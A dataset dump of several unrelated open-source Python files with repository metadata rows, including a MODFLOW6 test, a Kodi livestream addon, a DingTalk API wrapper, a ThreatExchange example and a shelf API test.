printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")], ) return sim, None def eval_results(sim): print("evaluating results...") # calculate volume of water and make sure it is conserved name = ex[sim.idxsim] gwfname = "gwf_" + name fname = gwfname + ".lak.bin" fname = os.path.join(sim.simpath, fname) assert os.path.isfile(fname) bobj = flopy.utils.HeadFile(fname, text="STAGE") stage = bobj.get_alldata().flatten() # print(stage) fname = gwfname + ".hds" fname = os.path.join(sim.simpath, fname) assert os.path.isfile(fname) hobj = flopy.utils.HeadFile(fname) head = hobj.get_data() # print(head) # calculate initial water volume v0 = 3.5 * 2 # outermost columns v0 += 2.5 * 2 # next innermost columns v0 += 2.0 * 2 # next innermost columns v0 += 1.0 * 1 # middle column v0 = v0 * 0.3 # specific yield v0 = v0 + (2.25 - 2.0) * 2 + (2.25 - 1.0) print("initial volume of water in model = {}".format(v0)) # calculate ending water volume in model h = head[0, 0, 0] s = stage[-1] v = h * 4 + 2.0 * 2 + 1.0 * 1 v = v * 0.3 # specific yield v = v + (s - 2.0) * 2 + (s - 1.0) print("final volume of water in model = {}".format(v)) # check to make sure starting water volume same as equalized final volume errmsg = "initial and final water volume not equal: {} {}".format(v0, v) assert np.allclose(v0, v) # todo: add a better check of the lake concentrations # assert False # - No need to change any code below @pytest.mark.parametrize( "idx, dir", list(enumerate(exdirs)), ) def test_mf6model(idx, dir): # initialize testing framework test = testing_framework() # build the model test.build_mf6_models(build_model, idx, dir) # run the test model test.run_mf6(Simulation(dir, exfunc=eval_results, idxsim=idx)) def main(): # initialize testing framework test = testing_framework() # run the test model for idx, dir in enumerate(exdirs): test.build_mf6_models(build_model, idx, dir) sim = Simulation(dir, exfunc=eval_results, idxsim=idx) test.run_mf6(sim) if __name__ == "__main__": # print message print("standalone run of {}".format(os.path.basename(__file__))) # run main routine main()
29.073333
90
0.576015
0
0
0
0
332
0.038065
0
0
2,544
0.291676
beb37d345ad255de414b430caeba23a0fa10d2d1
441
py
Python
lesson-08/roll_dice_v1.0.py
hemiaoio/pylearning
4b3885ed7177db4e6e03da80dd9ed69719c8d866
[ "MIT" ]
1
2018-11-11T03:44:02.000Z
2018-11-11T03:44:02.000Z
lesson-08/roll_dice_v1.0.py
hemiaoio/learn-python
4b3885ed7177db4e6e03da80dd9ed69719c8d866
[ "MIT" ]
null
null
null
lesson-08/roll_dice_v1.0.py
hemiaoio/learn-python
4b3885ed7177db4e6e03da80dd9ed69719c8d866
[ "MIT" ]
null
null
null
""" 功能:模拟掷骰子 版本:1.0 """ import random def roll_dice(): roll = random.randint(1, 6) return roll def main(): total_times = 100000 result_list = [0] * 6 for i in range(total_times): roll = roll_dice() result_list[roll-1] += 1 for i, x in enumerate(result_list): print('点数{}的次数:{},频率:{}'.format(i+1, x, x/total_times)) print(result_list) if __name__ == '__main__': main()
15.206897
63
0.569161
0
0
0
0
0
0
0
0
101
0.20911
beb557aa11e275e2f9691dee969a012dab3f26db
759
py
Python
composer/dataflow-python3/main.py
gxercavins/gcp-snippets
a90e4e9c922370face876aa7c56db610896e1a6f
[ "Apache-2.0" ]
2
2022-02-07T07:53:35.000Z
2022-02-23T18:46:03.000Z
composer/dataflow-python3/main.py
gxercavins/gcp-snippets
a90e4e9c922370face876aa7c56db610896e1a6f
[ "Apache-2.0" ]
1
2019-10-26T19:03:34.000Z
2019-10-26T19:03:48.000Z
composer/dataflow-python3/main.py
gxercavins/gcp-snippets
a90e4e9c922370face876aa7c56db610896e1a6f
[ "Apache-2.0" ]
6
2020-03-19T23:58:46.000Z
2022-02-07T07:53:37.000Z
import argparse import logging import apache_beam as beam from apache_beam.options.pipeline_options import PipelineOptions from apache_beam.options.pipeline_options import SetupOptions def run(argv=None, save_main_session=True): """Dummy pipeline to test Python3 operator.""" parser = argparse.ArgumentParser() known_args, pipeline_args = parser.parse_known_args(argv) pipeline_options = PipelineOptions(pipeline_args) pipeline_options.view_as(SetupOptions).save_main_session = save_main_session p = beam.Pipeline(options=pipeline_options) # Just a simple test p | 'Create Events' >> beam.Create([1, 2, 3]) result = p.run() result.wait_until_finish() if __name__ == '__main__': logging.getLogger().setLevel(logging.INFO) run()
27.107143
78
0.777339
0
0
0
0
0
0
0
0
91
0.119895
beb680071d94ed8dd93dc11b2e313714df1f9b83
1,727
py
Python
dingtalk/message/conversation.py
kangour/dingtalk-python
b37b9dac3ca3ff9d727308fb120a8fd05e11eaa5
[ "Apache-2.0" ]
88
2017-12-28T05:23:15.000Z
2021-12-20T13:44:18.000Z
dingtalk/message/conversation.py
niulinlnc/dingtalk-python
c4209658f88344e8f0890137ed7c887c8b740a6c
[ "Apache-2.0" ]
8
2018-04-28T05:41:49.000Z
2021-06-01T21:51:11.000Z
dingtalk/message/conversation.py
niulinlnc/dingtalk-python
c4209658f88344e8f0890137ed7c887c8b740a6c
[ "Apache-2.0" ]
43
2017-12-07T09:43:48.000Z
2021-12-03T01:19:52.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2017/11/30 下午3:02 # @Author : Matrix # @Github : https://github.com/blackmatrix7/ # @Blog : http://www.cnblogs.com/blackmatrix/ # @File : messages.py # @Software: PyCharm import json from ..foundation import * from json import JSONDecodeError __author__ = 'blackmatrix' __all__ = ['async_send_msg', 'get_msg_send_result', 'get_msg_send_progress'] @dingtalk_resp def async_send_msg(access_token, msgtype, agent_id, msgcontent, userid_list=None, dept_id_list=None, to_all_user=False): try: msgcontent = json.dumps(msgcontent) except JSONDecodeError: # 如果传入的msgcontent不能转换为json格式,依旧传给钉钉,由钉钉处理 pass if not isinstance(userid_list, str): userid_list = ','.join(userid_list) args = locals().copy() payload = {} # 请求参数整理 for k, v in args.items(): if k in ('msgtype', 'agent_id', 'msgcontent', 'userid_list', 'dept_id_list'): if v is not None: payload.update({k: v}) resp = call_dingtalk_webapi(access_token, 'dingtalk.corp.message.corpconversation.asyncsend', **payload) return resp @dingtalk_resp def get_msg_send_result(access_token, agent_id, task_id): url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendresult') payload = {'task_id': task_id, 'agent_id': agent_id} return requests.get(url, params=payload) @dingtalk_resp def get_msg_send_progress(access_token, agent_id, task_id): url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendprogress') payload = {'task_id': task_id, 'agent_id': agent_id} return requests.get(url, params=payload) if __name__ == '__main__': pass
31.981481
120
0.70469
0
0
0
0
1,337
0.745678
0
0
676
0.377022
beb69b31ba90004b6f8731fea0065e0f64e36216
1,412
py
Python
backend/garpix_page/setup.py
griviala/garpix_page
55f1d9bc6d1de29d18e15369bebcbef18811b5a4
[ "MIT" ]
null
null
null
backend/garpix_page/setup.py
griviala/garpix_page
55f1d9bc6d1de29d18e15369bebcbef18811b5a4
[ "MIT" ]
null
null
null
backend/garpix_page/setup.py
griviala/garpix_page
55f1d9bc6d1de29d18e15369bebcbef18811b5a4
[ "MIT" ]
null
null
null
from setuptools import setup, find_packages from os import path here = path.join(path.abspath(path.dirname(__file__)), 'garpix_page') with open(path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() setup( name='garpix_page', version='2.23.0', description='', long_description=long_description, url='https://github.com/garpixcms/garpix_page', author='Garpix LTD', author_email='[email protected]', license='MIT', packages=find_packages(exclude=['testproject', 'testproject.*']), classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Framework :: Django', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', ], include_package_data=True, zip_safe=False, install_requires=[ 'Django >= 1.11', 'django-polymorphic-tree-for-garpix-page >= 2.1.1', 'django-modeltranslation >= 0.16.2', 'django-multiurl >= 1.4.0', 'djangorestframework >= 3.12.4', 'garpix_utils >= 1.4.0', 'django-tabbed-admin >= 1.0.4', 'model-bakery >= 1.4.0' ], )
32.090909
69
0.607649
0
0
0
0
0
0
0
0
736
0.521246
beb76b3debe06f273a8ef3ec32c53943cd031a3b
20,225
py
Python
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py
C6SUMMER/allinclusive-kodi-pi
8baf247c79526849c640c6e56ca57a708a65bd11
[ "Apache-2.0" ]
null
null
null
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py
C6SUMMER/allinclusive-kodi-pi
8baf247c79526849c640c6e56ca57a708a65bd11
[ "Apache-2.0" ]
null
null
null
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py
C6SUMMER/allinclusive-kodi-pi
8baf247c79526849c640c6e56ca57a708a65bd11
[ "Apache-2.0" ]
2
2018-04-17T17:34:39.000Z
2020-07-26T03:43:33.000Z
# -*- coding: utf-8 -*- """ p2p-streams (c) 2014 enen92 fightnight This file contains the livestream addon engine. It is mostly based on divingmule work on livestreams addon! Functions: xml_lists_menu() -> main menu for the xml list category addlista() -> add a new list. It'll ask for local or remote and processes the given input remove_list(name) -> Remove a list get_groups(url) -> First regex function to parse a given list. Sopcast type list get_channels(name,url) -> Second regex function to parse a given list. Used to general livestreams xml type lists getData(url,fanart) -> Get the item data such as iconimage, fanart, etc getChannelItems(name,url,fanart) -> Function to grab the channel items getItems(items,fanart) -> Function to grab the items from the xml removeNonAscii(s) -> Function to remove non-ascii characters from the list getSoup(url) -> uses beautifulsoup to parse a remote xml addon_log(string) -> Simple log/print function getRegexParsed(regexs, url) -> parse the regex expression list_type(url) -> Checks if the list is xml or m3u parse_m3u(url) -> Parses a m3u type list """ import urllib,urllib2,re,xbmcplugin,xbmcgui,xbmc,xbmcaddon,HTMLParser,time,datetime,os,xbmcvfs,sys from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP from peertopeerutils.pluginxbmc import * from peertopeerutils.webutils import * from peertopeerutils.directoryhandle import * from peertopeerutils.iofile import * """ Main Menu """ def xml_lists_menu(): if settings.getSetting('sopcast-oficial') == "true": addDir(translate(40116),"http://sopcast.org/chlist.xml",101,addonpath + art + 'xml_list_sopcast.png',2,True) try: if os.path.exists(os.path.join(pastaperfil,"Lists")): dirs, files = xbmcvfs.listdir(os.path.join(pastaperfil,"Lists")) for file in files: f = open(os.path.join(pastaperfil,"Lists",file), "r") string = f.read() if xbmcvfs.exists(os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg'))):addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True,fan_art=os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg'))) else: addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True) except: pass addDir(translate(40121),MainURL,107,addonpath + art + 'plus-menu.png',2,False) #xbmc.executebuiltin("Container.SetViewMode(51)") """ Add a new list function """ def addlista(): opcao= xbmcgui.Dialog().yesno(translate(40000), translate(40123),"","",translate(40124),translate(40125)) if opcao: dialog = xbmcgui.Dialog() lista_xml = dialog.browse(int(1), translate(40186), 'myprograms','.xml|.m3u') keybdois = xbmc.Keyboard("", translate(40130)) keybdois.doModal() if (keybdois.isConfirmed()): searchname = keybdois.getText() if searchname=='': sys.exit(0) encode=urllib.quote(searchname) if xbmcvfs.exists(os.path.join(pastaperfil,"Lists")): pass else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists")) txt_name = searchname + ".txt" save(os.path.join(pastaperfil,"Lists",txt_name),lista_xml) mensagemok(translate(40000),translate(40129)) xbmc.executebuiltin("XBMC.Container.Refresh") else: keyb = xbmc.Keyboard("", translate(40127)) keyb.doModal() if (keyb.isConfirmed()): search = keyb.getText() if search=='': sys.exit(0) if "dropbox" in search and not "?dl=1" in search: search = search + '?dl=1' if "xml" not in search.split(".")[-1] and "m3u" not in search.split(".")[-1]: mensagemok(translate(40000),translate(40128)); sys.exit(0) else: try: code = get_page_source(search) except: mensagemok(translate(40000),translate(40128)) sys.exit(0) keybdois = xbmc.Keyboard("", translate(40130)) keybdois.doModal() if (keybdois.isConfirmed()): searchname = keybdois.getText() if searchname=='': sys.exit(0) encode=urllib.quote(searchname) if os.path.exists(os.path.join(pastaperfil,"Lists")): pass else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists")) txt_name = searchname + ".txt" save(os.path.join(pastaperfil,"Lists",txt_name),search) mensagemok(translate(40000),translate(40129)) xbmc.executebuiltin("XBMC.Container.Refresh") """ Remove a List """ def remove_list(name): xbmcvfs.delete(name) xbmc.executebuiltin("Notification(%s,%s,%i,%s)" % (translate(40000), translate(40150), 1,addonpath+"/icon.png")) xbmc.executebuiltin("Container.Refresh") """ Parsing functions """ def list_type(url): ltype = url.split('.')[-1] if 'xml' in ltype: get_groups(url) elif 'm3u' in ltype: parse_m3u(url) else: pass def parse_m3u(url): if "http" in url: content = get_page_source(url) else: content = readfile(url) match = re.compile('#EXTINF:.+?,(.*?)\n(.*?)(?:\r|\n)').findall(content) for channel_name,stream_url in match: if 'plugin://' in stream_url: stream_url = 'XBMC.RunPlugin('+stream_url+')' addDir(channel_name,stream_url,106,'',1,False) elif 'sop://' in stream_url: addDir(channel_name,stream_url,2,'',1,False) elif ('acestream://' in stream_url) or ('.acelive' in stream_url) or ('.torrent' in stream_url): addDir(channel_name,stream_url,1,'',1,False) else: addLink(channel_name,stream_url,'') def get_groups(url): from xml.etree import ElementTree try: print("Sopcast xml-type list detected") if "http" in url: source = get_page_source(url) save(os.path.join(pastaperfil,"working.xml"),source) workingxml = os.path.join(pastaperfil,"working.xml") else: workingxml = url groups = ElementTree.parse(workingxml).findall('.//group') unname_group_index = 1 LANGUAGE = "en" for group in groups: if group.attrib[LANGUAGE] == "": group.attrib[LANGUAGE] = str(unname_group_index) unname_group_index = unname_group_index + 1 if re.sub('c','e',LANGUAGE) == LANGUAGE: OTHER_LANG = re.sub('e','c',LANGUAGE) else: OTHER_LANG = re.sub('c','e',LANGUAGE) if LANGUAGE == "cn": try: if len(group.attrib[OTHER_LANG]) > 0: group.attrib[LANGUAGE] = group.attrib[OTHER_LANG] unname_group_index = unname_group_index - 1 except: pass if (group.find('.//channel')==None): continue group_name=group.attrib[LANGUAGE] try: addDir_livestreams_common(group_name,url,102,addonpath + art + 'xml_list_sopcast.png',True) except: pass #xbmc.executebuiltin("Container.SetViewMode(51)") except: print("Other type of xml list") getData(url,"") def get_channels(name,url): from xml.etree import ElementTree if url.startswith('http://'): source = get_page_source(url) else: source = readfile(url) save(os.path.join(pastaperfil,"working.xml"),source) chlist_tree = ElementTree.parse(os.path.join(pastaperfil,"working.xml")) LANGUAGE = "en" groups = ElementTree.parse(os.path.join(pastaperfil,"working.xml")).findall('.//group') for group in groups: if group.attrib[LANGUAGE].encode('utf-8') == name: channels = group.findall('.//channel') for channel in channels: try: try: title = channel.find('.//name').attrib['en'].encode('utf-8') except: title = '' if not title: try: title = channel.find('.//name').attrib['cn'].encode('utf-8') except: title = '' if not title: try: title = channel.find('.//name').text except: title = '' tipo = channel.find('.//stream_type').text sop_address = channel.find('.//item').text if not tipo: tipo = "N/A" if not title: title = "N/A" thumbnail = "" try: thumbnail = channel.find('.//thumbnail').text except: pass if sop_address: if thumbnail == "": thumbnail = addonpath + art + 'sopcast_link.png' try: addDir_livestreams_common('[B][COLOR orange]' + title + ' [/B][/COLOR](' + tipo +')',sop_address,2,thumbnail,False) except:pass else: pass except: pass else: pass def getData(url,fanart): soup = getSoup(url) if len(soup('channels')) > 0: channels = soup('channel') for channel in channels: name = channel('name')[0].string thumbnail = channel('thumbnail')[0].string if thumbnail == None: thumbnail = '' try: if not channel('fanart'): if addon.getSetting('use_thumb') == "true": fanArt = thumbnail else: fanArt = fanart else: fanArt = channel('fanart')[0].string if fanArt == None: raise except: fanArt = fanart try: desc = channel('info')[0].string if desc == None: raise except: desc = '' try: genre = channel('genre')[0].string if genre == None: raise except: genre = '' try: date = channel('date')[0].string if date == None: raise except: date = '' try: credits = channel('credits')[0].string if credits == None: raise except: credits = '' try: addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),103,thumbnail,fanArt,desc,genre,date,credits,True) except: addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore')) else: addon_log('No Channels: getItems') getItems(soup('item'),fanart) def getChannelItems(name,url,fanart): soup = getSoup(url) channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')}) items = channel_list('item') try: fanArt = channel_list('fanart')[0].string if fanArt == None: raise except: fanArt = fanart for channel in channel_list('subchannel'): name = channel('name')[0].string try: thumbnail = channel('thumbnail')[0].string if thumbnail == None: raise except: thumbnail = '' try: if not channel('fanart'): if addon.getSetting('use_thumb') == "true": fanArt = thumbnail else: fanArt = channel('fanart')[0].string if fanArt == None: raise except: pass try: desc = channel('info')[0].string if desc == None: raise except: desc = '' try: genre = channel('genre')[0].string if genre == None: raise except: genre = '' try: date = channel('date')[0].string if date == None: raise except: date = '' try: credits = channel('credits')[0].string if credits == None: raise except: credits = '' try: addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date) except: addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore')) getItems(items,fanArt) def getItems(items,fanart): total = len(items) addon_log('Total Items: %s' %total) for item in items: try: name = item('title')[0].string if name is None: name = 'unknown?' except: addon_log('Name Error') name = '' try: if item('epg'): if item.epg_url: addon_log('Get EPG Regex') epg_url = item.epg_url.string epg_regex = item.epg_regex.string epg_name = get_epg(epg_url, epg_regex) if epg_name: name += ' - ' + epg_name elif item('epg')[0].string > 1: name += getepg(item('epg')[0].string) else: pass except: addon_log('EPG Error') try: url = [] for i in item('link'): if not i.string == None: url.append(i.string) if len(url) < 1: raise except: addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore')) continue try: thumbnail = item('thumbnail')[0].string if thumbnail == None: raise except: thumbnail = '' try: if not item('fanart'): if addon.getSetting('use_thumb') == "true": fanArt = thumbnail else: fanArt = fanart else: fanArt = item('fanart')[0].string if fanArt == None: raise except: fanArt = fanart try: desc = item('info')[0].string if desc == None: raise except: desc = '' try: genre = item('genre')[0].string if genre == None: raise except: genre = '' try: date = item('date')[0].string if date == None: raise except: date = '' regexs = None if item('regex'): try: regexs = {} for i in item('regex'): regexs[i('name')[0].string] = {} regexs[i('name')[0].string]['expre'] = i('expres')[0].string regexs[i('name')[0].string]['page'] = i('page')[0].string try: regexs[i('name')[0].string]['refer'] = i('referer')[0].string except: addon_log("Regex: -- No Referer --") try: regexs[i('name')[0].string]['agent'] = i('agent')[0].string except: addon_log("Regex: -- No User Agent --") regexs = urllib.quote(repr(regexs)) except: regexs = None addon_log('regex Error: '+name.encode('utf-8', 'ignore')) try: if "RunPlugin" in url[0]: try: addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],106,thumbnail,fanArt,desc,genre,"credits",date) except: match = re.compile("&name=(.+?)\)").findall(url[0].replace(";","")) if match: try: addDir_livestreams(name.encode('utf-8', 'ignore'),removeNonAscii(url[0]),106,thumbnail,fanArt,desc,genre,credits,date) except: try: addDir_livestreams(removeNonAscii(name.encode('utf-8', 'ignore')),removeNonAscii(url[0].replace(";","")),106,thumbnail,fanArt,desc,genre,credits,date) except: addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore')) else: addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore')) else: if ('acestream://' in url[0]) or ('.acelive' in url[0]) or ('.torrent' in url[0]): if 'plugin://' not in url[0]: addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],1,thumbnail,fanArt,desc,genre,"credits",date) else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total) elif 'sop://' in url[0]: if 'plugin://' not in url[0]: addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],2,thumbnail,fanArt,desc,genre,"credits",date) else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total) else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total) except: addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore')) def removeNonAscii(s): return "".join(filter(lambda x: ord(x)<128, s)) def getSoup(url): if url.startswith('http://'): data = makeRequest(url) else: if xbmcvfs.exists(url): if url.startswith("smb://") or url.startswith("nfs://"): copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt')) if copy: data = open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read() xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt')) else: addon_log("failed to copy from smb:") else: data = open(url, 'r').read() else: addon_log("Soup Data not found!") return return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES) def addon_log(string): print(string) def getRegexParsed(regexs, url): regexs = eval(urllib.unquote(regexs)) cachedPages = {} doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url) for k in doRegexs: if k in regexs: m = regexs[k] if m['page'] in cachedPages: link = cachedPages[m['page']] else: req = urllib2.Request(m['page']) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1') if 'refer' in m: req.add_header('Referer', m['refer']) if 'agent' in m: req.add_header('User-agent', m['agent']) response = urllib2.urlopen(req) link = response.read() response.close() cachedPages[m['page']] = link reg = re.compile(m['expre']).search(link) url = url.replace("$doregex[" + k + "]", reg.group(1).strip()) item = xbmcgui.ListItem(path=url) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
38.745211
303
0.514907
0
0
0
0
0
0
0
0
4,037
0.199604
beb77481d7d9ef64134079c15cf78aedfbcf66f2
187
py
Python
RainIt/rain_it/ric/Procedure.py
luisgepeto/RainItPi
47cb7228e9c584c3c4489ebc78abf6de2096b770
[ "MIT" ]
null
null
null
RainIt/rain_it/ric/Procedure.py
luisgepeto/RainItPi
47cb7228e9c584c3c4489ebc78abf6de2096b770
[ "MIT" ]
null
null
null
RainIt/rain_it/ric/Procedure.py
luisgepeto/RainItPi
47cb7228e9c584c3c4489ebc78abf6de2096b770
[ "MIT" ]
null
null
null
from ric.RainItComposite import RainItComposite class Procedure(RainItComposite): def __init__(self): super().__init__() def get_pickle_form(self): return self
18.7
47
0.705882
136
0.727273
0
0
0
0
0
0
0
0
beb861661de128962032b82c144ceaca4b7cc85f
81
py
Python
1067.py
FahimFBA/URI-Problem-Solve
d718a95e5a873dffbce19d850998e8917ec87ebb
[ "Apache-2.0" ]
3
2020-11-25T19:05:31.000Z
2021-03-29T07:29:36.000Z
1067.py
FahimFBA/URI-Problem-Solve
d718a95e5a873dffbce19d850998e8917ec87ebb
[ "Apache-2.0" ]
null
null
null
1067.py
FahimFBA/URI-Problem-Solve
d718a95e5a873dffbce19d850998e8917ec87ebb
[ "Apache-2.0" ]
null
null
null
valor = int(input()) for i in range(valor+1): if(i%2 != 0): print(i)
16.2
24
0.506173
0
0
0
0
0
0
0
0
0
0
beb987a1f2b8198bf13096fe552301ac5d99117d
889
py
Python
api-reference-examples/python/te-tag-query/api-example-update.py
b-bold/ThreatExchange
6f8d0dc803faccf576c9398569bb52d54a4f9a87
[ "BSD-3-Clause" ]
997
2015-03-13T18:04:03.000Z
2022-03-30T12:09:10.000Z
api-reference-examples/python/te-tag-query/api-example-update.py
b-bold/ThreatExchange
6f8d0dc803faccf576c9398569bb52d54a4f9a87
[ "BSD-3-Clause" ]
444
2015-03-26T17:28:49.000Z
2022-03-28T19:34:05.000Z
api-reference-examples/python/te-tag-query/api-example-update.py
b-bold/ThreatExchange
6f8d0dc803faccf576c9398569bb52d54a4f9a87
[ "BSD-3-Clause" ]
294
2015-03-13T22:19:43.000Z
2022-03-30T08:42:45.000Z
#!/usr/bin/env python # ================================================================ # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved # ================================================================ import sys import json import TE TE.Net.setAppTokenFromEnvName("TX_ACCESS_TOKEN") postParams = { "descriptor_id": "4036655176350945", # ID of the descriptor to be updated "reactions": "INGESTED,IN_REVIEW", } showURLs = False dryRun = False validationErrorMessage, serverSideError, responseBody = TE.Net.updateThreatDescriptor( postParams, showURLs, dryRun ) if validationErrorMessage != None: sys.stderr.write(validationErrorMessage + "\n") sys.exit(1) if serverSideError != None: sys.stderr.write(str(serverSideError) + "\n") sys.stderr.write(json.dumps(responseBody) + "\n") sys.exit(1) print(json.dumps(responseBody))
26.147059
86
0.620922
0
0
0
0
0
0
0
0
352
0.395951
beb9a541895990f03cef5c41fda543323a1a2725
12,362
py
Python
loaner/web_app/backend/api/shelf_api_test.py
Bottom-Feeders/GrabNGO
5a467362e423700a5a7276a7fa9a47040033cfcf
[ "Apache-2.0" ]
null
null
null
loaner/web_app/backend/api/shelf_api_test.py
Bottom-Feeders/GrabNGO
5a467362e423700a5a7276a7fa9a47040033cfcf
[ "Apache-2.0" ]
null
null
null
loaner/web_app/backend/api/shelf_api_test.py
Bottom-Feeders/GrabNGO
5a467362e423700a5a7276a7fa9a47040033cfcf
[ "Apache-2.0" ]
null
null
null
# Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for backend.api.shelf_api.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import parameterized import mock from protorpc import message_types from google.appengine.api import search import endpoints from loaner.web_app.backend.api import root_api # pylint: disable=unused-import from loaner.web_app.backend.api import shelf_api from loaner.web_app.backend.api.messages import shared_messages from loaner.web_app.backend.api.messages import shelf_messages from loaner.web_app.backend.models import device_model from loaner.web_app.backend.models import shelf_model # pylint: disable=unused-import from loaner.web_app.backend.testing import loanertest class ShelfApiTest(parameterized.TestCase, loanertest.EndpointsTestCase): """Test for the Shelf API.""" def setUp(self): super(ShelfApiTest, self).setUp() self.patcher_directory = mock.patch( '__main__.device_model.directory.DirectoryApiClient') self.mock_directoryclass = self.patcher_directory.start() self.addCleanup(self.patcher_directory.stop) self.service = shelf_api.ShelfApi() self.login_admin_endpoints_user() self.patcher_xsrf = mock.patch( '__main__.shelf_api.root_api.Service.check_xsrf_token') self.shelf = shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='NYC', capacity=10, friendly_name='GnG', latitude=40.6892534, longitude=-74.0466891, altitude=1.0) shelf1 = shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='MTV', capacity=20) shelf2 = shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='SAO', capacity=10) self.disabled_shelf = shelf_model.Shelf.enroll( user_email=loanertest.USER_EMAIL, location='SVL', capacity=10, friendly_name='Bay') self.disabled_shelf.disable(loanertest.USER_EMAIL) self.shelf_locations = [ self.shelf.location, shelf1.location, shelf2.location, self.disabled_shelf.location] self.device1_key = device_model.Device( serial_number='12345', enrolled=True, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_1', damaged=False, ).put() self.device2_key = device_model.Device( serial_number='54321', enrolled=True, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_2', damaged=False, ).put() self.device3_key = device_model.Device( serial_number='67890', enrolled=True, shelf=self.shelf.key, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_3', damaged=False, ).put() self.device4_key = device_model.Device( serial_number='ABC123', enrolled=True, shelf=self.shelf.key, device_model='HP Chromebook 13 G1', current_ou='/', chrome_device_id='unique_id_4', damaged=False, ).put() self.device_identifiers = [ self.device1_key.get().serial_number, self.device2_key.get().serial_number, self.device3_key.get().serial_number] def tearDown(self): super(ShelfApiTest, self).tearDown() self.service = None @mock.patch('__main__.root_api.Service.check_xsrf_token') @mock.patch('__main__.shelf_model.Shelf.enroll') def test_enroll(self, mock_enroll, mock_xsrf_token): """Test Enroll with mock methods.""" request = shelf_messages.EnrollShelfRequest( location='nyc', capacity=100, friendly_name='test', latitude=12.5, longitude=12.5, altitude=2.0, responsible_for_audit='precise', audit_interval_override=33, audit_notification_enabled=True) response = self.service.enroll(request) self.assertEqual(mock_xsrf_token.call_count, 1) self.assertIsInstance(response, message_types.VoidMessage) def test_enroll_bad_request(self): request = shelf_messages.EnrollShelfRequest(capacity=10) with self.assertRaisesRegexp( shelf_api.endpoints.BadRequestException, 'Entity has uninitialized properties'): self.service.enroll(request) request = shelf_messages.EnrollShelfRequest( location='nyc', capacity=10, latitude=12.5) with self.assertRaisesRegexp( shelf_api.endpoints.BadRequestException, shelf_model._LAT_LONG_MSG): self.service.enroll(request) @mock.patch('__main__.root_api.Service.check_xsrf_token') def test_get_by_location(self, mock_xsrf_token): request = shelf_messages.ShelfRequest(location='NYC') response = self.service.get(request) self.assertEqual(mock_xsrf_token.call_count, 1) self.assertEqual(self.shelf.location, response.location) self.assertEqual(self.shelf.friendly_name, response.friendly_name) def test_disable_by_location(self): request = shelf_messages.ShelfRequest(location='NYC') self.assertTrue(self.shelf.enabled) response = self.service.disable(request) self.assertFalse(self.shelf.enabled) self.assertIsInstance(response, message_types.VoidMessage) @mock.patch('__main__.root_api.Service.check_xsrf_token') def test_update_using_location(self, mock_xsrf_token): request = shelf_messages.UpdateShelfRequest( shelf_request=shelf_messages.ShelfRequest(location='NYC'), location='NYC-9th') response = self.service.update(request) self.assertEqual(mock_xsrf_token.call_count, 1) 